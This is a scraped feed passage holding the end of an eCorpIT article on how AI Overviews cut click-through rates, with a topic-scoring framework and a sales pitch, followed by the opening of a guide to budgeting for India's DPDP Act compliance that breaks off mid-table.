&lt;td&gt;8.44&lt;/td&gt;
&lt;td&gt;168,145&lt;/td&gt;
&lt;td&gt;348&lt;/td&gt;
&lt;td&gt;0.207%&lt;/td&gt;
&lt;td&gt;1.67% at position 8&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;when is ios 27 coming out&lt;/td&gt;
&lt;td&gt;8.86&lt;/td&gt;
&lt;td&gt;31,168&lt;/td&gt;
&lt;td&gt;29&lt;/td&gt;
&lt;td&gt;0.093%&lt;/td&gt;
&lt;td&gt;2.90% at position 9&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;nextjs typescript 7&lt;/td&gt;
&lt;td&gt;4.23&lt;/td&gt;
&lt;td&gt;56&lt;/td&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;16.07%&lt;/td&gt;
&lt;td&gt;3.94% at position 4&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The comparison to sit with is the first row against the last. "ios 27" ranks at position 2.77 and converts 0.149% of impressions. "nextjs typescript 7" ranks worse, at position 4.23, and converts 16.07%. That is 108 times the CTR from a lower position.&lt;/p&gt;

&lt;p&gt;In absolute terms it is starker. Fifty-six impressions produced nine clicks. Nine thousand three hundred and eighty-five impressions produced fourteen.&lt;/p&gt;

&lt;p&gt;"ios 27" at position 2.77 runs about 73 times below our own site average for position 3. "ios 27 release date 2026" at position 4.60 runs about 47 times below our position-4 average. These are not ranking failures. Google is showing our page high up and answering the question above it.&lt;/p&gt;

&lt;h3&gt;
  
  
  The honest caveats
&lt;/h3&gt;

&lt;p&gt;This is one site, and the sample is dominated by a single iOS 27 cluster, so the answer-shaped cohort is really one topic measured many ways. The non-answer-shaped cohort is small: 378 impressions across three queries, which is enough to be suggestive and not enough to be conclusive on its own. The site-average CTR figures above position 10 rest on tiny keyword counts and are noisy, which is why we have not used them.&lt;/p&gt;

&lt;p&gt;What makes it worth publishing is that it points the same direction as a 300,000-keyword study, from the opposite end of the scale. The framework below is what we do about it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Answer-shaped versus click-shaped
&lt;/h2&gt;

&lt;p&gt;The distinction that predicts CTR is not head versus long tail, informational versus commercial, or volume versus difficulty. It is whether the query has a terminal answer.&lt;/p&gt;

&lt;p&gt;A query is answer-shaped when a correct, complete response fits in a paragraph and nothing follows it. "ios 27 release date" is answer-shaped. The answer is a date. Once you have the date, there is nothing left to want. Any AI Overview that names the date has fully served the user, and your page is decoration below it.&lt;/p&gt;

&lt;p&gt;A query is click-shaped when a correct response opens more questions than it closes, or when the value is in artefacts a summary cannot carry: a config file, a benchmark table, a decision under constraints, a number specific to the reader's situation.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Signal&lt;/th&gt;
&lt;th&gt;Answer-shaped (avoid)&lt;/th&gt;
&lt;th&gt;Click-shaped (target)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Query form&lt;/td&gt;
&lt;td&gt;"release date", "what is X", "is X out yet", "when does X"&lt;/td&gt;
&lt;td&gt;"X vs Y for Z", "how to do X with Y", "X cost breakdown", "why does X fail when Y"&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Complete answer length&lt;/td&gt;
&lt;td&gt;One sentence or one number&lt;/td&gt;
&lt;td&gt;Multiple sections, tables or code&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;What the reader does next&lt;/td&gt;
&lt;td&gt;Nothing, they have the fact&lt;/td&gt;
&lt;td&gt;Applies it, compares, configures, budgets&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AI Overview risk&lt;/td&gt;
&lt;td&gt;Total, the panel is the product&lt;/td&gt;
&lt;td&gt;Partial, the panel becomes a teaser&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Our observed CTR&lt;/td&gt;
&lt;td&gt;0.295% blended across 12 queries&lt;/td&gt;
&lt;td&gt;5.82% blended across 3 queries&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Volume&lt;/td&gt;
&lt;td&gt;Usually high&lt;/td&gt;
&lt;td&gt;Usually low&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Value per impression&lt;/td&gt;
&lt;td&gt;Near zero&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The trap is that answer-shaped queries have the volume. "ios 27 release date" has 168,145 impressions in 90 days. "nextjs typescript 7" has 56. Every keyword tool will rank the first one higher on every metric except the only one that pays.&lt;/p&gt;

&lt;h2&gt;
  
  
  The click-survivability score
&lt;/h2&gt;

&lt;p&gt;We score every candidate topic out of 10 before it enters the queue. Six questions, weighted by how well each predicted CTR in our own data.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Does a complete answer fit in one paragraph? If yes, score 0 on this dimension. If it needs sections, tables or code, score 3.&lt;/li&gt;
&lt;li&gt;Can we produce something the panel cannot summarise? Original benchmarks, first-party data, a working config, a real price. Score 0 to 3.&lt;/li&gt;
&lt;li&gt;Does answering it well require judgement under constraints? "Which should I use" beats "what is". Score 0 to 2.&lt;/li&gt;
&lt;li&gt;Is the reader mid-task rather than mid-curiosity? Someone with a terminal open clicks. Someone idly wondering does not. Score 0 to 2.&lt;/li&gt;
&lt;li&gt;Would a wrong answer cost the reader money or a rollback? Stakes drive verification, and verification drives clicks. Score 0 to 2.&lt;/li&gt;
&lt;li&gt;Penalty: is the query a known AI Overview trigger shape? Subtract 2 for date, definition, yes/no or single-fact queries.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Anything scoring 6 or above gets written. Below 6, it does not, regardless of volume.&lt;/p&gt;

&lt;p&gt;Applied to real candidates:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Candidate query&lt;/th&gt;
&lt;th&gt;Q1&lt;/th&gt;
&lt;th&gt;Q2&lt;/th&gt;
&lt;th&gt;Q3&lt;/th&gt;
&lt;th&gt;Q4&lt;/th&gt;
&lt;th&gt;Q5&lt;/th&gt;
&lt;th&gt;Penalty&lt;/th&gt;
&lt;th&gt;Score&lt;/th&gt;
&lt;th&gt;Verdict&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;ios 27 release date&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;-2&lt;/td&gt;
&lt;td&gt;-2&lt;/td&gt;
&lt;td&gt;Never&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;what is an AI Overview&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;-2&lt;/td&gt;
&lt;td&gt;-1&lt;/td&gt;
&lt;td&gt;Never&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;UCP vs ACP vs AP2 for merchants&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;Write&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DPDP compliance cost for a startup&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Write&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ios 27 MDM migration for fleets&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Write&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;is ios 27 out yet&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;-2&lt;/td&gt;
&lt;td&gt;-2&lt;/td&gt;
&lt;td&gt;Never&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The scoring is deliberately harsh on question 1. In our data, one-paragraph-answerable queries never cleared 0.3% CTR regardless of position.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do with the answer-shaped rankings you already have
&lt;/h2&gt;

&lt;p&gt;Most sites are not starting clean. We rank well on a cluster of queries that pay us almost nothing, which is an asset with the wrong monetisation, not a liability.&lt;/p&gt;

&lt;p&gt;Three options, in descending order of how often they work.&lt;/p&gt;

&lt;p&gt;Consolidate and re-point. If you have five pages competing on variants of one date query, you have five pages splitting a 0.2% CTR. Merge them into one timeline page and use it to link into the click-shaped work. The date query becomes a distribution channel for the article that actually earns, not a destination. Our &lt;a href="https://ecorpit.com/ranking-one-no-clicks-geo-fixes-2026/" rel="noopener noreferrer"&gt;GEO fixes for ranking first without clicks&lt;/a&gt; covers the consolidation mechanics.&lt;/p&gt;

&lt;p&gt;Re-shape the page, not the keyword. You cannot make "ios 27 release date" click-shaped. You can make the page that ranks for it answer a second question the panel will not: what breaks in your MDM fleet on upgrade day. The query stays answer-shaped. The page stops being.&lt;/p&gt;

&lt;p&gt;Accept it as brand impressions and stop measuring it as traffic. Three hundred thousand impressions at 0.3% is a weak traffic channel and a reasonable awareness channel. The mistake is booking it as the former and being confused by the revenue.&lt;/p&gt;

&lt;p&gt;What does not work is chasing the ranking. We already rank 2.77 on "ios 27" and it converts 0.149%. Position one would not fix that. Per the Ahrefs table, position one is where the AI Overview takes the most.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where the clicks went, and what still earns them
&lt;/h2&gt;

&lt;p&gt;Zero-click search is not new, and AI Overviews are the latest in a sequence that includes Featured Snippets, Local Pack and Top Stories. Ahrefs make this point directly: CTR for non-AI-Overview informational keywords also fell over the same period, from 0.076 to 0.039. The panel accelerated a trend that predates it.&lt;/p&gt;

&lt;p&gt;The strategic read is that the queries surviving are the ones where the value is not the fact. Four categories hold up in our data and in the published studies:&lt;/p&gt;

&lt;p&gt;Comparisons with real benchmarks. Not "X vs Y" listicles, which summarise fine, but comparisons carrying numbers a panel cannot compress without losing the point.&lt;/p&gt;

&lt;p&gt;Cost and pricing breakdowns. Specific, dated, with the assumptions visible. A summary of a cost model is not usable. The model is.&lt;/p&gt;

&lt;p&gt;How-tos with code, configs or templates. The artefact is the product. A panel describing a config does not save anyone the work of writing it.&lt;/p&gt;

&lt;p&gt;Decision-stage questions under constraints. "Which of these should we build on, given we are on Shopify and sell in India" has no terminal answer. It has a recommendation, and recommendations invite scrutiny, which is a click.&lt;/p&gt;

&lt;p&gt;The common property is that a correct summary of the page increases rather than decreases the reader's need to open it. That is the actual test. If a perfect AI Overview of your article would satisfy the reader, do not write it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The keyword sources that surface click-shaped queries
&lt;/h2&gt;

&lt;p&gt;Search Console is a poor discovery tool for this work, because it only shows queries you already rank for, which skews toward what you have already written. It is a measurement tool, not a source.&lt;/p&gt;

&lt;p&gt;Sources that surface click-shaped candidates:&lt;/p&gt;

&lt;p&gt;Google Trends rising and breakout terms, filtered for anything with a task in it. Rising queries have not yet been saturated by content, and breakout terms often outrun the panel's confidence.&lt;/p&gt;

&lt;p&gt;Product and event launch calendars, but targeting the second-order question. Not the release date. What the release breaks.&lt;/p&gt;

&lt;p&gt;Competitor keyword gaps where the competitor's page is thin. A thin page ranking on a click-shaped query is an opening, because the query deserves depth and nobody has supplied it.&lt;/p&gt;

&lt;p&gt;People Also Ask and community questions, read for the follow-up rather than the question. The first question is usually answer-shaped. The third one in the thread rarely is.&lt;/p&gt;

&lt;p&gt;Your own support tickets and sales calls. These are pure click-shaped signal, because nobody opens a ticket about a release date.&lt;/p&gt;

&lt;h2&gt;
  
  
  India-specific considerations
&lt;/h2&gt;

&lt;p&gt;Two things differ for teams targeting Indian queries.&lt;/p&gt;

&lt;p&gt;Volume distributions are more extreme. The gap between a high-volume answer-shaped query and a low-volume click-shaped one is wider, which makes the score above harder to defend internally when someone points at the volume column. The arithmetic does not change. Twelve queries at 307,668 impressions paid us 909 clicks. Three queries at 378 impressions paid us 22. The second set cost far less to produce.&lt;/p&gt;

&lt;p&gt;Query language mixing matters. Hinglish and transliterated queries are frequently answer-shaped in ways the panel handles well, while the genuinely click-shaped Indian queries tend to be pricing, regulation and vendor-selection questions where local constraints make the answer non-generic. DPDP, UPI and ONDC questions score well precisely because the correct answer depends on rules that are specific, changing and consequential. Our &lt;a href="https://ecorpit.com/aeo-vs-geo-vs-seo-complete-guide/" rel="noopener noreferrer"&gt;AEO, GEO and SEO guide&lt;/a&gt; covers how these surface differently across engines.&lt;/p&gt;

&lt;h2&gt;
  
  
  What we changed in our own pipeline
&lt;/h2&gt;

&lt;p&gt;We used to queue topics by search volume and keyword difficulty. The iOS 27 cluster looked outstanding on both. It produced 307,668 impressions and 909 clicks in 90 days.&lt;/p&gt;

&lt;p&gt;Three changes since:&lt;/p&gt;

&lt;p&gt;Every candidate topic gets the survivability score before it is queued, and anything under 6 is dropped no matter what the volume says. We do not queue "release date" topics at all now.&lt;/p&gt;

&lt;p&gt;Every article must contain at least one thing we produced rather than retrieved: a benchmark, a config, a table of our own numbers, a cost model. If we cannot name that artefact before writing, the topic is not ready.&lt;/p&gt;

&lt;p&gt;We measure clicks per article, not impressions or position. The dashboards that made the iOS 27 cluster look like a success were measuring the wrong column.&lt;/p&gt;

&lt;p&gt;The honest summary of our own data is that we spent 90 days ranking well for questions Google had already answered. The &lt;a href="https://ecorpit.com/google-ai-mode-default-zero-click-survival-2026/" rel="noopener noreferrer"&gt;zero-click survival playbook&lt;/a&gt; and the &lt;a href="https://ecorpit.com/geo-platform-playbook-chatgpt-perplexity-ai-overviews-2026/" rel="noopener noreferrer"&gt;GEO platform playbook&lt;/a&gt; cover what we built instead.&lt;/p&gt;

&lt;h2&gt;
  
  
  FAQ
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;What is click-survivability in keyword selection?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Click-survivability is whether a query still sends clicks once an AI Overview answers it. Queries with a terminal one-paragraph answer, like release dates or definitions, lose nearly all clicks. Queries needing tables, code, benchmarks or judgement under constraints keep them, because a summary increases rather than removes the reader's need to open the page.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How much do AI Overviews actually reduce clicks?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Ahrefs analysed 300,000 keywords and found the presence of an AI Overview correlates with a 58% lower CTR for the top-ranking page as of December 2025, up from 34.5% in April 2025. Corroborating studies range from Authoritas at 47.5% to Seer Interactive between 49.4% and 65.2%.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Does ranking first still matter with AI Overviews?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Less than it did, and not in the direction most teams assume. Ahrefs' per-position data shows the CTR damage is worst at position one at 58% and mildest at position ten at 19.4%. Climbing an AI Overview query moves you into the zone where the panel takes the largest share of available clicks.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Which keywords still send clicks in 2026?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Four types hold up: comparisons carrying real benchmarks, cost and pricing breakdowns with visible assumptions, how-tos shipping code or configs, and decision-stage questions constrained by the reader's situation. The shared property is that a correct summary of the page leaves the reader needing the page.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How do I test whether a keyword is answer-shaped?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Write the complete correct answer. If it fits in one paragraph and nothing follows it, the query is answer-shaped and an AI Overview will serve it fully. If the answer needs sections, a table, a configuration or a recommendation the reader might argue with, it is click-shaped and worth writing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Should I delete pages ranking on answer-shaped queries?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Usually not. Consolidate variants into one page, then use that page to route readers into work that earns clicks. Treat the impressions as an awareness channel rather than a traffic channel. Deleting discards distribution; the error is booking those impressions as traffic and being surprised by the revenue.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why did a page at position 4 outperform one at position 2.8?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Because shape beat position. In our 16 April to 15 July 2026 Search Console data, "nextjs typescript 7" at position 4.23 converted 16.07% of impressions while "ios 27" at position 2.77 converted 0.149%. The first query implies a task with no terminal answer. The second is a fact Google states directly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is Search Console enough for keyword research now?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;No. Search Console only reports queries you already rank for, so it reflects what you have written rather than what is worth writing. Use it to measure click-survivability after publishing, and use Google Trends rising terms, People Also Ask follow-ups, competitor gaps and your own support tickets to find candidates.&lt;/p&gt;

&lt;h2&gt;
  
  
  How eCorpIT can help
&lt;/h2&gt;

&lt;p&gt;eCorpIT is a CMMI Level 5 certified, senior-led engineering organisation in Gurugram that runs this framework on its own content before recommending it to anyone. We audit which of your rankings are earning clicks and which are decorating an answer panel, score your topic pipeline for click-survivability, and rebuild content around artefacts a summary cannot replace. Talk to our team via &lt;a href="https://ecorpit.com/contact-us/" rel="noopener noreferrer"&gt;/contact-us/&lt;/a&gt; about a search visibility and GEO review.&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;a href="https://ahrefs.com/blog/ai-overviews-reduce-clicks-update/" rel="noopener noreferrer"&gt;Update: AI Overviews Reduce Clicks by 58%&lt;/a&gt;. Ryan Law and Xibeijia Guan, Ahrefs, 4 February 2026&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://ahrefs.com/blog/ai-overviews-reduce-clicks/" rel="noopener noreferrer"&gt;AI Overviews Reduce Clicks by 34.5%&lt;/a&gt;. Ahrefs, April 2025&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://ahrefs.com/blog/zero-click-search/" rel="noopener noreferrer"&gt;Welcome to Zero-Click Search&lt;/a&gt;. Ahrefs&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://ahrefs.com/blog/how-serp-features-have-evolved-in-the-ai-era/" rel="noopener noreferrer"&gt;How SERP Features Have Evolved in the AI Era&lt;/a&gt;. Ahrefs&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://ahrefs.com/blog/ai-overview-triggers/" rel="noopener noreferrer"&gt;What Triggers AI Overviews? 86 Factors and 146 Million SERPs Analyzed&lt;/a&gt;. Ahrefs&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://ahrefs.com/blog/how-to-rank-in-ai-overviews/" rel="noopener noreferrer"&gt;How to Rank in AI Overviews: What Actually Works&lt;/a&gt;. Ahrefs&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://ahrefs.com/blog/ai-overview-change/" rel="noopener noreferrer"&gt;AI Overviews Change Every 2 Days&lt;/a&gt;. Ahrefs&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://ahrefs.com/blog/how-to-track-ai-overviews/" rel="noopener noreferrer"&gt;How to Track AI Overviews: Mentions, Citations, Click Loss&lt;/a&gt;. Ahrefs&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://searchengineland.com/google-zero-click-searches-2026-study-479717" rel="noopener noreferrer"&gt;Google zero-click searches reach 68% in early 2026: Study&lt;/a&gt;. Search Engine Land&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.growth-memo.com/p/gsc-data-is-75-incomplete" rel="noopener noreferrer"&gt;GSC data is 75% incomplete&lt;/a&gt;. Kevin Indig, Growth Memo&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://pressgazette.co.uk/media-audience-and-business-data/google-ai-overviews-publishers-report-clickthroughs-authoritas-report/" rel="noopener noreferrer"&gt;Google AI Overviews: publishers report clickthrough declines&lt;/a&gt;. Press Gazette, on the Authoritas report&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.medianama.com/2026/02/223-google-ai-overviews-click-through-rates-58-study/" rel="noopener noreferrer"&gt;Google AI Overviews Reduce Clicks By 58%, Study Finds&lt;/a&gt;. Medianama, February 2026&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://psyke.co/google-ai-overviews-statistics" rel="noopener noreferrer"&gt;Google AI Overviews statistics: key CTR and traffic insights&lt;/a&gt;. Psyke&lt;/li&gt;
&lt;li&gt;eCorpIT Google Search Console, property ecorpit.com, 16 April to 15 July 2026. CTR by average position and query-level clicks, impressions and position. First-party data reported in this article.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Last updated: 16 July 2026.&lt;/p&gt;

</description>
      <category>seo</category>
      <category>aioverviews</category>
      <category>keywordresearch</category>
      <category>geo</category>
    </item>
    <item>
      <title>DPDP compliance costs for Indian startups: what to budget before 13 May 2027</title>
      <dc:creator>Manu Shukla</dc:creator>
      <pubDate>Wed, 15 Jul 2026 18:34:14 +0000</pubDate>
      <link>https://dev.to/mr_manushukla/dpdp-compliance-costs-for-indian-startups-what-to-budget-before-13-may-2027-fi8</link>
      <guid>https://dev.to/mr_manushukla/dpdp-compliance-costs-for-indian-startups-what-to-budget-before-13-may-2027-fi8</guid>
      <description>&lt;h1&gt;
  
  
  DPDP compliance costs for Indian startups: what to budget before 13 May 2027
&lt;/h1&gt;

&lt;p&gt;&lt;strong&gt;Summary.&lt;/strong&gt; Full compliance with India's Digital Personal Data Protection Act is due on 13 May 2027. That is the date consent, notice, security safeguards, breach intimation and data-principal rights all become enforceable, and it is roughly 10 months away. The DPDP Rules 2025 were notified on 13 November 2025 and land in three phases: the Data Protection Board of India stood up immediately, penalties and Consent Manager registration begin on 13 November 2026, and everything else bites on 13 May 2027. The penalty schedule is not proportionate to your size: up to ₹250 crore for failing reasonable security safeguards, ₹200 crore for failing to notify a breach, and ₹150 crore for missing Significant Data Fiduciary obligations. There is no revenue or headcount exemption. The cost gap is where founders get hurt. Vendors routinely quote ₹15 lakh to ₹2 crore for DPDPA compliance, while a startup under 10,000 users can be substantively compliant for under ₹50,000 a year. India's privacy and data governance market is worth roughly $1 billion to $1.5 billion today, per IDfy founder Ashok Hariharan speaking to Inc42 in April 2026, and a lot of that revenue depends on you not reading the rules yourself.&lt;/p&gt;

&lt;p&gt;This is a budgeting guide, not a legal opinion. The rules are short. Read them, then price the work.&lt;/p&gt;

&lt;h2&gt;
  
  
  The deadline that actually matters
&lt;/h2&gt;

&lt;p&gt;There are three dates, and only one of them is a real deadline for most startups.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Phase&lt;/th&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;What switches on&lt;/th&gt;
&lt;th&gt;Does it affect a typical startup?&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Phase 1&lt;/td&gt;
&lt;td&gt;13 November 2025&lt;/td&gt;
&lt;td&gt;Data Protection Board of India established, Rules notified&lt;/td&gt;
&lt;td&gt;No direct obligation, but the Board can already receive complaints&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Phase 2&lt;/td&gt;
&lt;td&gt;13 November 2026&lt;/td&gt;
&lt;td&gt;Consent Manager registration opens, penalty framework and enforcement powers begin&lt;/td&gt;
&lt;td&gt;Only if you intend to register as a Consent Manager&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Phase 3&lt;/td&gt;
&lt;td&gt;13 May 2027&lt;/td&gt;
&lt;td&gt;Notice, consent, security safeguards, breach intimation, retention, children's data, data-principal rights&lt;/td&gt;
&lt;td&gt;Yes. This is your deadline&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Phase 2 confuses people. Consent Manager registration is not something a normal startup does. A Consent Manager is a regulated intermediary that lets people manage consent across fiduciaries, and Schedule I Part A of the Rules requires it to be a company incorporated in India with a net worth of at least ₹2 crore. If you are a D2C brand or a SaaS company, you are a Data Fiduciary, not a Consent Manager. You may use one. You do not register as one.&lt;/p&gt;

&lt;p&gt;So the working number is 13 May 2027, and the planning horizon from mid-July 2026 is about 10 months.&lt;/p&gt;

&lt;h2&gt;
  
  
  What the rules actually require
&lt;/h2&gt;

&lt;p&gt;Most cost estimates float free of the rules. Here is what the text says, rule by rule, and what each one costs in engineering terms.&lt;/p&gt;

&lt;p&gt;Rule 3, notice. You must give the data principal a notice that is understandable independently of any other information, listing the personal data collected and the purpose. Engineering cost: low. This is copy plus a consent-capture screen.&lt;/p&gt;

&lt;p&gt;Rule 6, reasonable security safeguards. Encryption, obfuscation, masking or virtual tokens; access control; logs and monitoring; backups; contractual terms with processors. Engineering cost: this is the big one, and most of it is work you should already be doing.&lt;/p&gt;

&lt;p&gt;Rule 7, breach intimation. Two obligations fire the moment you become aware of a breach. You must tell each affected data principal without delay, in plain language, covering the nature and extent of the breach, likely consequences for them, your mitigation, safety measures they can take, and a contact. Separately you must tell the Board without delay, then file a detailed report within 72 hours of becoming aware, extendable only on written request. Engineering cost: moderate, and it is detection tooling, not paperwork.&lt;/p&gt;

&lt;p&gt;That 72-hour figure is worth pinning down because secondary summaries drift. &lt;a href="https://www.dpdpa.com/dpdparules/rule7.html" rel="noopener noreferrer"&gt;Rule 7(2)(b)&lt;/a&gt; says "within seventy-two hours of becoming aware of the breach". The notification to individuals and the first intimation to the Board are both "without delay", which is stricter than 72 hours, not looser.&lt;/p&gt;

&lt;p&gt;Rule 8, retention. Data must be erased once the specified purpose is no longer served, with Schedule III setting default periods for large platforms.&lt;/p&gt;

&lt;p&gt;Rule 13, Significant Data Fiduciary obligations. DPO, data protection impact assessment, annual audit, algorithmic due diligence. Only applies if the Central Government notifies you.&lt;/p&gt;

&lt;p&gt;Rule 14, data-principal rights. Access, correction, erasure, grievance redressal, nomination. Engineering cost: moderate. This is a workflow, and it is the line item vendors price highest.&lt;/p&gt;

&lt;p&gt;The technology lawyer Mishi Choudhary, founder of the Software Freedom Law Center, put the asymmetry plainly to &lt;a href="https://inc42.com/features/indias-data-privacy-rules-will-dpdp-act-compliance-costs-crush-startups/" rel="noopener noreferrer"&gt;Inc42&lt;/a&gt; in November 2025:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"The rules are simple in words but will require investment in implementation. Large companies already have security and compliance teams but it's going to require a lot of restructuring and investments by smaller players."&lt;br&gt;
Mishi Choudhary, technology lawyer and founder, Software Freedom Law Center&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;She also made the point that decides your breach budget: "The reporting timelines are aggressive and will require external tooling. Forensic disclosures cannot be made within the expected timelines."&lt;/p&gt;

&lt;p&gt;Read that as an engineering requirement. You cannot answer Rule 7 in 72 hours from cold logs.&lt;/p&gt;

&lt;h2&gt;
  
  
  The penalty ladder
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Failure&lt;/th&gt;
&lt;th&gt;Maximum penalty&lt;/th&gt;
&lt;th&gt;Rule or section&lt;/th&gt;
&lt;th&gt;Realistic exposure for a startup&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;No reasonable security safeguards, leading to a breach&lt;/td&gt;
&lt;td&gt;₹250 crore&lt;/td&gt;
&lt;td&gt;Schedule to the Act, Rule 6&lt;/td&gt;
&lt;td&gt;The headline number, applied proportionately&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Failure to notify the Board or data principals of a breach&lt;/td&gt;
&lt;td&gt;₹200 crore&lt;/td&gt;
&lt;td&gt;Rule 7&lt;/td&gt;
&lt;td&gt;High, because it is a process failure you control&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Non-compliance with children's data provisions&lt;/td&gt;
&lt;td&gt;₹200 crore&lt;/td&gt;
&lt;td&gt;Rules 10 to 12&lt;/td&gt;
&lt;td&gt;Only if you process children's data&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Failure to meet additional SDF obligations&lt;/td&gt;
&lt;td&gt;₹150 crore&lt;/td&gt;
&lt;td&gt;Rule 13&lt;/td&gt;
